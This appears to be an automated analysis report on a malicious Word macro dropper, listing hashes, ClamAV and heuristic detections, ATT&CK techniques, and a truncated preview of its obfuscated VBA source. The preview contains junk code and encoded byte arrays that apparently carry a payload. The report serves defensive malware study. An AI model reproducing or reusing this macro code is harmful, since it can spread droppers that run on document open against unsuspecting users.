Office (OLE) malware analysis — malicious · 8a79a4997e9cf158

MALICIOUS

Office (OLE)

305.5 KB Created: 2015-12-16 14:32:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 5d417fe1dbd2ee915ac8bdc8baa1b826 SHA-1: 09665782cdec82eb03ff6dc62a671a372b50561e SHA-256: 8a79a4997e9cf1582c08c2555a560b7cabe0611022c193154539cbffe9513465

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, which is a critical heuristic indicating execution of arbitrary commands. ClamAV detection as 'Doc.Dropper.Agent-6379868-0' further confirms its malicious nature as a dropper. The VBA code is heavily obfuscated, but the presence of the Shell() call strongly suggests it's designed to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6379868-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6379868-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45572 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45572 bytes
SHA-256: `074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long #Else Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long #End If Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant Sub LHJwPn() NrSyi8bt999vkR = 71 If Abs(6) = 57 Then OzAJDIA = 7498 Load QHW95ygCCXLKMlehi DateSerial 52, 90, 50 DeleteSetting "Qp4Y8D4vz89Olb" Randomize DyCTQ9UKs03HGVdP = EOF(96) If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80 DWcjwawOjsm = CVErr(31) Hour 53 AppActivate 41 HDM9913zDtS = 60 End Sub Function zKK(U6jMo As Integer) As Boolean PdKLCGN = 61 Static HFBwwFtzVi0lGw38q As Byte G7UUZ5FN3z = 78 HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1 OuWaqUF1z = 48 If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59) AeIBD = 73 zKK = HFBwwFtzVi0lGw38q = 0 Q9dlGz5OfQm = 70 HFBwwFtzVi0lGw38q = 0 QPM3j8cFUa0L = 81 End Function Sub OJwHPvvkNBx() WBJkej = 47 On Error Resume Next B0K8bUdQ = 54 A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237) VpGcg5LX = 51 A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11 ... (truncated)

SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.